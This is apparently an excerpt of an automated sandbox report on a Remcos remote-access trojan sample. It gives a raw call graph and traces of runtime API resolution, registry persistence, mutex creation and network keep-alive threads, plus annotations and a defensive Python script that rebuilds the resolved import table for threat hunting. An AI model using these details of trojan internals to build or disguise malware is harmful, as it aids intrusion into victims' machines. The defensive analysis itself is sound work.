46310->46884 46311 40d87f 46643 401eef 46311->46643 46314 40d88b 46647 401eea 46314->46647 46316 40d894 46318 401eea 26 API calls 46316->46318 46317 401eea 26 API calls 46319 40dc9f 46317->46319 46320 40d89d 46318->46320 46558 433c94 GetModuleHandleW 46319->46558 46321 401d64 28 API calls 46320->46321 46322 40d8a6 46321->46322 46651 401ebd 46322->46651 46324 40d8b1 46325 401d64 28 API calls 46324->46325 46326 40d8ca 46325->46326 46327 401d64 28 API calls 46326->46327 46329 40d8e5 46327->46329 46328 40d946 46331 
401d64 28 API calls 46328->46331 46346 40e134 46328->46346 46329->46328 46885 4085b4 46329->46885 46336 40d95d 46331->46336 46332 40d912 46333 401eef 26 API calls 46332->46333 46334 40d91e 46333->46334 46337 401eea 26 API calls 46334->46337 46335 40d9a4 46655 40bed7 46335->46655 46336->46335 46342 4124b7 3 API calls 46336->46342 46338 40d927 46337->46338 46889 4124b7 RegOpenKeyExA 46338->46889 46340 40d9aa 46341 40d82d 46340->46341 46658 41a463 46340->46658 46341->46317 46347 40d988 46342->46347 46345 40d9c5 46348 40da18 46345->46348 46675 40697b 46345->46675 46965 412902 30 API calls 46346->46965 46347->46335 46892 412902 30 API calls 46347->46892 46350 401d64 28 API calls 46348->46350 46353 40da21 46350->46353 46362 40da32 46353->46362 46363 40da2d 46353->46363 46355 40e14a 46966 4112b5 64 API calls ___scrt_fastfail 46355->46966 46357 40d9e4 46893 40699d 30 API calls 46357->46893 46358 40d9ee 46360 401d64 28 API calls 46358->46360 46370 40d9f7 46360->46370 46367 401d64 28 API calls 46362->46367 46896 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46363->46896 46364 40d9e9 46894 4064d0 97 API calls 46364->46894 46368 40da3b 46367->46368 46679 41ae08 46368->46679 46370->46348 46373 40da13 46370->46373 46371 40da46 46683 401e18 46371->46683 46895 4064d0 97 API calls 46373->46895 46374 40da51 46687 401e13 46374->46687 46377 40da5a 46378 401d64 28 API calls 46377->46378 46379 40da63 46378->46379 46380 401d64 28 API calls 46379->46380 46381 40da7d 46380->46381 46382 401d64 28 API calls 46381->46382 46383 40da97 46382->46383 46384 401d64 28 API calls 46383->46384 46386 40dab0 46384->46386 46385 40db1d 46387 40db2c 46385->46387 46394 40dcaa ___scrt_fastfail 46385->46394 46386->46385 46388 401d64 28 API calls 46386->46388 46389 40db35 46387->46389 46417 40dbb1 ___scrt_fastfail 46387->46417 46392 40dac5 _wcslen 46388->46392 46390 401d64 28 API calls 46389->46390 46391 40db3e 46390->46391 46393 401d64 28 API calls 46391->46393 46392->46385 46395 401d64 28 
API calls 46392->46395 46396 40db50 46393->46396 46956 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46394->46956 46397 40dae0 46395->46397 46399 401d64 28 API calls 46396->46399 46400 401d64 28 API calls 46397->46400 46401 40db62 46399->46401 46402 40daf5 46400->46402 46404 401d64 28 API calls 46401->46404 46897 40c89e 46402->46897 46403 40dcef 46405 401d64 28 API calls 46403->46405 46406 40db8b 46404->46406 46407 40dd16 46405->46407 46411 401d64 28 API calls 46406->46411 46701 401f66 46407->46701 46410 401e18 26 API calls 46413 40db14 46410->46413 46414 40db9c 46411->46414 46416 401e13 26 API calls 46413->46416 46954 40bc67 45 API calls _wcslen 46414->46954 46415 40dd25 46705 4126d2 RegCreateKeyA 46415->46705 46416->46385 46691 4128a2 46417->46691 46421 40dc45 ctype 46426 401d64 28 API calls 46421->46426 46422 40dbac 46422->46417 46424 401d64 28 API calls 46425 40dd47 46424->46425 46711 43a5e7 46425->46711 46427 40dc5c 46426->46427 46427->46403 46431 40dc70 46427->46431 46430 40dd5e 46957 41beb0 86 API calls ___scrt_fastfail 46430->46957 46433 401d64 28 API calls 46431->46433 46432 40dd81 46437 401f66 28 API calls 46432->46437 46435 40dc7e 46433->46435 46438 41ae08 28 API calls 46435->46438 46436 40dd65 CreateThread 46436->46432 47353 41c96f 10 API calls 46436->47353 46439 40dd96 46437->46439 46440 40dc87 46438->46440 46441 401f66 28 API calls 46439->46441 46955 40e219 109 API calls 46440->46955 46444 40dda5 46441->46444 46443 40dc8c 46443->46403 46446 40dc93 46443->46446 46715 41a686 46444->46715 46446->46341 46448 401d64 28 API calls 46449 40ddb6 46448->46449 46450 401d64 28 API calls 46449->46450 46451 40ddcb 46450->46451 46452 401d64 28 API calls 46451->46452 46453 40ddeb 46452->46453 46454 43a5e7 _strftime 42 API calls 46453->46454 46455 40ddf8 46454->46455 46456 401d64 28 API calls 46455->46456 46457 40de03 46456->46457 46458 401d64 28 API calls 46457->46458 46459 40de14 46458->46459 46460 401d64 28 API calls 46459->46460 46461 40de29 46460->46461 46462 
401d64 28 API calls 46461->46462 46463 40de3a 46462->46463 46464 40de41 StrToIntA 46463->46464 46739 409517 46464->46739 46467 401d64 28 API calls 46468 40de5c 46467->46468 46469 40dea1 46468->46469 46470 40de68 46468->46470 46473 401d64 28 API calls 46469->46473 46958 43360d 22 API calls 3 library calls 46470->46958 46472 40de71 46475 401d64 28 API calls 46472->46475 46474 40deb1 46473->46474 46477 40def9 46474->46477 46478 40debd 46474->46478 46476 40de84 46475->46476 46479 40de8b CreateThread 46476->46479 46481 401d64 28 API calls 46477->46481 46959 43360d 22 API calls 3 library calls 46478->46959 46479->46469 47357 419128 102 API calls 2 library calls 46479->47357 46483 40df02 46481->46483 46482 40dec6 46484 401d64 28 API calls 46482->46484 46486 40df6c 46483->46486 46487 40df0e 46483->46487 46485 40ded8 46484->46485 46489 40dedf CreateThread 46485->46489 46490 401d64 28 API calls 46486->46490 46488 401d64 28 API calls 46487->46488 46492 40df1e 46488->46492 46489->46477 47356 419128 102 API calls 2 library calls 46489->47356 46491 40df75 46490->46491 46493 40df81 46491->46493 46494 40dfba 46491->46494 46495 401d64 28 API calls 46492->46495 46497 401d64 28 API calls 46493->46497 46764 41a7a2 GetComputerNameExW GetUserNameW 46494->46764 46498 40df33 46495->46498 46500 40df8a 46497->46500 46960 40c854 31 API calls 46498->46960 46505 401d64 28 API calls 46500->46505 46501 401e18 26 API calls 46502 40dfce 46501->46502 46504 401e13 26 API calls 46502->46504 46507 40dfd7 46504->46507 46508 40df9f 46505->46508 46506 40df46 46509 401e18 26 API calls 46506->46509 46510 40dfe0 SetProcessDEPPolicy 46507->46510 46511 40dfe3 CreateThread 46507->46511 46518 43a5e7 _strftime 42 API calls 46508->46518 46512 40df52 46509->46512 46510->46511 46513 40e004 46511->46513 46514 40dff8 CreateThread 46511->46514 47325 40e54f 46511->47325 46515 401e13 26 API calls 46512->46515 46516 40e019 46513->46516 46517 40e00d CreateThread 46513->46517 46514->46513 47352 410f36 136 API calls 
46514->47352 46519 40df5b CreateThread 46515->46519 46521 40e073 46516->46521 46523 401f66 28 API calls 46516->46523 46517->46516 47354 411524 38 API calls ___scrt_fastfail 46517->47354 46520 40dfac 46518->46520 46519->46486 47355 40196b 49 API calls _strftime 46519->47355 46961 40b95c 7 API calls 46520->46961 46775 41246e RegOpenKeyExA 46521->46775 46524 40e046 46523->46524 46962 404c9e 28 API calls 46524->46962 46527 40e053 46529 401f66 28 API calls 46527->46529 46531 40e062 46529->46531 46530 40e12a 46787 40cbac 46530->46787 46535 41a686 79 API calls 46531->46535 46533 41ae08 28 API calls 46534 40e0a4 46533->46534 46778 412584 RegOpenKeyExW 46534->46778 46537 40e067 46535->46537 46539 401eea 26 API calls 46537->46539 46539->46521 46542 401e13 26 API calls 46545 40e0c5 46542->46545 46543 40e0ed DeleteFileW 46544 40e0f4 46543->46544 46543->46545 46547 41ae08 28 API calls 46544->46547 46545->46543 46545->46544 46546 40e0db Sleep 46545->46546 46963 401e07 46546->46963 46549 40e104 46547->46549 46783 41297a RegOpenKeyExW 46549->46783 46551 40e117 46552 401e13 26 API calls 46551->46552 46553 40e121 46552->46553 46554 401e13 26 API calls 46553->46554 46554->46530 46555->46241 46556->46248 46557->46245 46558->46255 46559->46257 46560->46260 46561->46235 46562->46238 46563->46242 46564->46264 46565->46266 46566->46268 46567->46271 46569 433c71 GetStartupInfoW 46568->46569 46569->46275 46571 44dddb 46570->46571 46572 44ddd2 46570->46572 46571->46279 46575 44dcc8 51 API calls 5 library calls 46572->46575 46574->46279 46575->46571 46577 41bd22 LoadLibraryA GetProcAddress 46576->46577 46578 41bd12 GetModuleHandleA GetProcAddress 46576->46578 46579 41bd4b 32 API calls 46577->46579 46580 41bd3b LoadLibraryA GetProcAddress 46577->46580 46578->46577 46579->46283 46580->46579 46967 41a63f FindResourceA 46581->46967 46584 43a88c _Yarn 21 API calls 46585 40e192 _Yarn 46584->46585 46970 401f86 46585->46970 46588 401eef 26 API calls 46589 40e1b8 46588->46589 46590 401eea 26 API calls 
46589->46590 46591 40e1c1 46590->46591 46592 43a88c _Yarn 21 API calls 46591->46592 46593 40e1d2 _Yarn 46592->46593 46974 406052 46593->46974 46595 40e205 46595->46285 46597 401fcc 46596->46597 46982 402501 46597->46982 46599 401fea 46599->46288 46613 41afd6 46600->46613 46601 401eea 26 API calls 46602 41b078 46601->46602 46603 401eea 26 API calls 46602->46603 46605 41b080 46603->46605 46604 41b048 46989 403b60 28 API calls 46604->46989 46608 401eea 26 API calls 46605->46608 46611 40d7c6 46608->46611 46609 41b054 46612 401eef 26 API calls 46609->46612 46610 401eef 26 API calls 46610->46613 46621 40e8bd 46611->46621 46614 41b05d 46612->46614 46613->46604 46613->46610 46616 401eea 26 API calls 46613->46616 46620 41b046 46613->46620 46987 403b60 28 API calls 46613->46987 46988 41bfa9 28 API calls 46613->46988 46615 401eea 26 API calls 46614->46615 46617 41b065 46615->46617 46616->46613 46990 41bfa9 28 API calls 46617->46990 46620->46601 46622 40e8ca 46621->46622 46624 40e8da 46622->46624 46991 40200a 26 API calls 46622->46991 46624->46293 46626 40200a 46625->46626 46630 40203a 46626->46630 46992 402654 26 API calls 46626->46992 46628 40202b 46993 4026ba 26 API calls _Deallocate 46628->46993 46630->46295 46632 401d6c 46631->46632 46633 401d74 46632->46633 46994 401fff 28 API calls 46632->46994 46633->46300 46637 404ccb 46636->46637 46995 402e78 46637->46995 46639 404cee 46639->46307 47004 404bc4 46640->47004 46642 405cf4 46642->46311 46644 401efe 46643->46644 46646 401f0a 46644->46646 47013 4021b9 26 API calls 46644->47013 46646->46314 46649 4021b9 46647->46649 46648 4021e8 46648->46316 46649->46648 47014 40262e 26 API calls _Deallocate 46649->47014 46653 401ec9 46651->46653 46652 401ee4 46652->46324 46653->46652 46654 402325 28 API calls 46653->46654 46654->46652 47015 401e8f 46655->47015 46657 40bee1 CreateMutexA GetLastError 46657->46340 47017 41b15b 46658->47017 46663 401eef 26 API calls 46664 41a49f 46663->46664 46665 401eea 26 API calls 46664->46665 46666 41a4a7 
46665->46666 46667 41a4fa 46666->46667 46668 412513 31 API calls 46666->46668 46667->46345 46669 41a4cd 46668->46669 46670 41a4d8 StrToIntA 46669->46670 46671 41a4ef 46670->46671 46672 41a4e6 46670->46672 46673 401eea 26 API calls 46671->46673 47025 41c102 28 API calls 46672->47025 46673->46667 46676 40698f 46675->46676 46677 4124b7 3 API calls 46676->46677 46678 406996 46677->46678 46678->46357 46678->46358 46680 41ae1c 46679->46680 47026 40b027 46680->47026 46682 41ae24 46682->46371 46684 401e27 46683->46684 46686 401e33 46684->46686 47035 402121 26 API calls 46684->47035 46686->46374 46689 402121 46687->46689 46688 402150 46688->46377 46689->46688 47036 402718 26 API calls _Deallocate 46689->47036 46692 4128c0 46691->46692 46693 406052 28 API calls 46692->46693 46694 4128d5 46693->46694 46695 401fbd 28 API calls 46694->46695 46696 4128e5 46695->46696 46697 4126d2 29 API calls 46696->46697 46698 4128ef 46697->46698 46699 401eea 26 API calls 46698->46699 46700 4128fc 46699->46700 46700->46421 46702 401f6e 46701->46702 47037 402301 46702->47037 46706 412722 46705->46706 46708 4126eb 46705->46708 46707 401eea 26 API calls 46706->46707 46709 40dd3b 46707->46709 46710 4126fd RegSetValueExA RegCloseKey 46708->46710 46709->46424 46710->46706 46712 43a600 _strftime 46711->46712 47041 43993e 46712->47041 46716 41a737 46715->46716 46717 41a69c GetLocalTime 46715->46717 46719 401eea 26 API calls 46716->46719 46718 404cbf 28 API calls 46717->46718 46720 41a6de 46718->46720 46721 41a73f 46719->46721 46723 405ce6 28 API calls 46720->46723 46722 401eea 26 API calls 46721->46722 46724 40ddaa 46722->46724 46725 41a6ea 46723->46725 46724->46448 47075 4027cb 46725->47075 46727 41a6f6 46728 405ce6 28 API calls 46727->46728 46729 41a702 46728->46729 47078 406478 76 API calls 46729->47078 46731 41a710 46732 401eea 26 API calls 46731->46732 46733 41a71c 46732->46733 46734 401eea 26 API calls 46733->46734 46735 41a725 46734->46735 46736 401eea 26 API calls 46735->46736 46737 41a72e 
46736->46737 46738 401eea 26 API calls 46737->46738 46738->46716 46740 409536 _wcslen 46739->46740 46741 409541 46740->46741 46742 409558 46740->46742 46743 40c89e 31 API calls 46741->46743 46744 40c89e 31 API calls 46742->46744 46745 409549 46743->46745 46746 409560 46744->46746 46747 401e18 26 API calls 46745->46747 46748 401e18 26 API calls 46746->46748 46763 409553 46747->46763 46749 40956e 46748->46749 46750 401e13 26 API calls 46749->46750 46752 409576 46750->46752 46751 401e13 26 API calls 46753 4095ad 46751->46753 47098 40856b 28 API calls 46752->47098 47083 409837 46753->47083 46755 409588 47099 4028cf 46755->47099 46759 409593 46760 401e18 26 API calls 46759->46760 46761 40959d 46760->46761 46762 401e13 26 API calls 46761->46762 46762->46763 46763->46751 47118 403b40 46764->47118 46768 41a7fd 46769 4028cf 28 API calls 46768->46769 46770 41a807 46769->46770 46771 401e13 26 API calls 46770->46771 46772 41a810 46771->46772 46773 401e13 26 API calls 46772->46773 46774 40dfc3 46773->46774 46774->46501 46776 41248f RegQueryValueExA RegCloseKey 46775->46776 46777 40e08b 46775->46777 46776->46777 46777->46530 46777->46533 46779 4125b0 RegQueryValueExW RegCloseKey 46778->46779 46780 4125dd 46778->46780 46779->46780 46781 403b40 28 API calls 46780->46781 46782 40e0ba 46781->46782 46782->46542 46784 412992 RegDeleteValueW 46783->46784 46785 4129a6 46783->46785 46784->46785 46786 4129a2 46784->46786 46785->46551 46786->46551 46788 40cbc5 46787->46788 46789 41246e 3 API calls 46788->46789 46790 40cbcc 46789->46790 46791 40cbeb 46790->46791 47151 401602 46790->47151 46795 413fd4 46791->46795 46793 40cbd9 47154 4127d5 RegCreateKeyA 46793->47154 46796 413feb 46795->46796 47171 41aa73 46796->47171 46798 413ff6 46799 401d64 28 API calls 46798->46799 46800 41400f 46799->46800 46801 43a5e7 _strftime 42 API calls 46800->46801 46802 41401c 46801->46802 46803 414021 Sleep 46802->46803 46804 41402e 46802->46804 46803->46804 46805 401f66 28 API calls 46804->46805 46806 41403d 
46805->46806 46807 401d64 28 API calls 46806->46807 46808 41404b 46807->46808 46809 401fbd 28 API calls 46808->46809 46810 414053 46809->46810 46811 41afc3 28 API calls 46810->46811 46812 41405b 46811->46812 47175 404262 WSAStartup 46812->47175 46814 414065 46815 401d64 28 API calls 46814->46815 46816 41406e 46815->46816 46817 401d64 28 API calls 46816->46817 46842 4140ed 46816->46842 46818 414087 46817->46818 46819 401d64 28 API calls 46818->46819 46820 414098 46819->46820 46822 401d64 28 API calls 46820->46822 46821 41afc3 28 API calls 46821->46842 46823 4140a9 46822->46823 46825 401d64 28 API calls 46823->46825 46824 4085b4 28 API calls 46824->46842 46826 4140ba 46825->46826 46829 401d64 28 API calls 46826->46829 46827 4027cb 28 API calls 46827->46842 46828 401eef 26 API calls 46828->46842 46830 4140cb 46829->46830 46831 401d64 28 API calls 46830->46831 46832 4140dd 46831->46832 47277 404101 87 API calls 46832->47277 46834 41a686 79 API calls 46834->46842 46836 414244 WSAGetLastError 47278 41bc76 30 API calls 46836->47278 46841 401f66 28 API calls 46841->46842 46842->46821 46842->46824 46842->46827 46842->46828 46842->46834 46842->46836 46842->46841 46844 401d64 28 API calls 46842->46844 46846 404cbf 28 API calls 46842->46846 46847 401d8c 26 API calls 46842->46847 46848 405ce6 28 API calls 46842->46848 46849 43a5e7 _strftime 42 API calls 46842->46849 46851 401eea 26 API calls 46842->46851 46855 401fbd 28 API calls 46842->46855 46857 412513 31 API calls 46842->46857 46874 41446f 46842->46874 47176 413f9a 46842->47176 47181 4041f1 46842->47181 47188 404915 46842->47188 47203 40428c connect 46842->47203 47263 4047eb WaitForSingleObject 46842->47263 47279 404c9e 28 API calls 46842->47279 47280 413683 50 API calls 46842->47280 47281 4082dc 28 API calls 46842->47281 47282 440c51 26 API calls 46842->47282 47283 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46842->47283 46844->46842 46846->46842 46847->46842 46848->46842 46850 414b80 Sleep 46849->46850 46850->46842 

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                            • API String ID: 384173800-625181639
                                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
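The API entries above show the function at 0x41BCE3 resolving its imports at run time: each LoadLibraryA or GetModuleHandleA call is immediately followed by a GetProcAddress, and the call-site references (0041BCF8 through 0041BE63) all carry the same return address 0040D783. Joe Sandbox prints several stack slots after the real argument(s), so the second value shown in each loader entry is the name string already pushed for the GetProcAddress that follows; that reading of the trace is an inference from the listing, confirmed by the String ID list. The following Python script is an added example, not code from the Joe Sandbox report or from the Remcos sample: it pairs the loader and resolver lines to rebuild the dynamically resolved import table and maps the recovered names onto coarse capability tags. The input is a subset of the entries listed above, the capability table is an analyst's assumption, and treating an 8-hex-digit value in the name slot (the Shlwapi entry) as an ordinal is likewise an assumption.

```python
"""Rebuild a dynamically resolved import table from Joe Sandbox API-trace lines.

Added example, not part of the Joe Sandbox report or of the analysed sample.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: a subset of the entries the report lists for the
# function at 0x41BCE3 (return address 0040D783 on every line).
TRACE = """\
LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
GetProcAddress.KERNEL32(00000000), ref: 0041BD01
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
GetProcAddress.KERNEL32(00000000), ref: 0041BD58
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
GetProcAddress.KERNEL32(00000000), ref: 0041BD78
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
GetProcAddress.KERNEL32(00000000), ref: 0041BE09
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
GetProcAddress.KERNEL32(00000000), ref: 0041BE53
"""

# One trace line: <api>.<module>(<args>), ref: <call site>
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})$"
)
LOADERS = {"LoadLibraryA", "GetModuleHandleA"}

# Assumed triage tags (analyst's choice, not something the report states).
CAPABILITY_TAGS: Dict[str, str] = {
    "NtUnmapViewOfSection": "process hollowing / injection",
    "NtSuspendProcess": "process suspend/resume",
    "NtResumeProcess": "process suspend/resume",
    "IsUserAnAdmin": "privilege check",
    "IsWow64Process": "architecture check",
    "GetProcessImageFileNameW": "process enumeration",
    "GetExtendedTcpTable": "network connection enumeration",
    "GetExtendedUdpTable": "network connection enumeration",
    "GetComputerNameExW": "host fingerprinting",
    "SetProcessDEPPolicy": "DEP policy change",
}


@dataclass(frozen=True)
class ResolvedImport:
    module: str       # DLL name passed to LoadLibraryA / GetModuleHandleA
    symbol: str       # function name, or "#<n>" for an ordinal
    loader: str       # which loader call obtained the module handle
    load_ref: str     # call site of the loader
    resolve_ref: str  # call site of the matching GetProcAddress


def _symbol_from_stack_value(value: str) -> str:
    # Assumption: an 8-hex-digit value in the name slot is an ordinal passed
    # via MAKEINTRESOURCE rather than a string pointer Joe could dereference.
    if re.fullmatch(r"[0-9A-Fa-f]{8}", value):
        return f"#{int(value, 16)}"
    return value


def parse_trace(text: str) -> List[ResolvedImport]:
    """Pair each loader line with the GetProcAddress line that follows it."""
    resolved: List[ResolvedImport] = []
    pending: Optional[tuple] = None  # (module, symbol, loader, load_ref)
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip().lstrip("• ").strip())
        if not m:
            continue  # 'Part of subcall' lines and other noise are skipped
        api, args, ref = m["api"], m["args"].split(","), m["ref"]
        if api in LOADERS and len(args) >= 2:
            pending = (args[0], _symbol_from_stack_value(args[1]), api, ref)
        elif api == "GetProcAddress" and pending is not None:
            module, symbol, loader, load_ref = pending
            resolved.append(ResolvedImport(module, symbol, loader, load_ref, ref))
            pending = None
    return resolved


def capabilities(imports: List[ResolvedImport]) -> Dict[str, List[str]]:
    """Group the resolved symbols by capability tag, de-duplicating symbols."""
    tags: Dict[str, List[str]] = {}
    for imp in imports:
        tag = CAPABILITY_TAGS.get(imp.symbol)
        if tag and imp.symbol not in tags.setdefault(tag, []):
            tags[tag].append(imp.symbol)
    return tags


if __name__ == "__main__":
    table = parse_trace(TRACE)
    for imp in table:
        print(f"{imp.resolve_ref}: {imp.module}!{imp.symbol} via {imp.loader}")
    for tag, syms in capabilities(table).items():
        print(f"[{tag}] {', '.join(syms)}")
```

Run it on the full API list of a function block copied out of the report (the `•` bullets are stripped) to get an import table the static PE header does not contain; a binary that resolves NtUnmapViewOfSection, NtSuspendProcess and the Iphlpapi table enumerators this way, while its import directory stays quiet, is the pattern to hunt for.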

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7 (hKey 80000001 = HKEY_CURRENT_USER, samDesired 00020019 = KEY_READ)
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            • Sleep.KERNELBASE(00000BB8), ref: 0040E603 (00000BB8 = 3000 ms; the graph loops back into this Sleep until the path ending in ExitProcess is taken)
                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                            • Opcode ID: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                            • Opcode Fuzzy Hash: d0b700c6543029a90e3e86d7f1c8fe1d49ffd33392616e1de0625f56461d18dd
                                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                                                            Control-flow Graph

                                                                                                            Control-flow graph for the function at 0x404915: blocks 404915-404924 -> 40492a-404931 -> 404933-404937 / 404939-404940 -> 404942-404982 (GetLocalTime, then calls to 41ad46, 404c9e, 401f66, 41a686, 401eea; this is the block that references the "KeepAlive | Enabled | Timeout: " string) -> 404987-4049af (CreateEventA, CreateThread) -> 4049b1 / 4049b3-4049b7 (exit).
                                                                                                            APIs
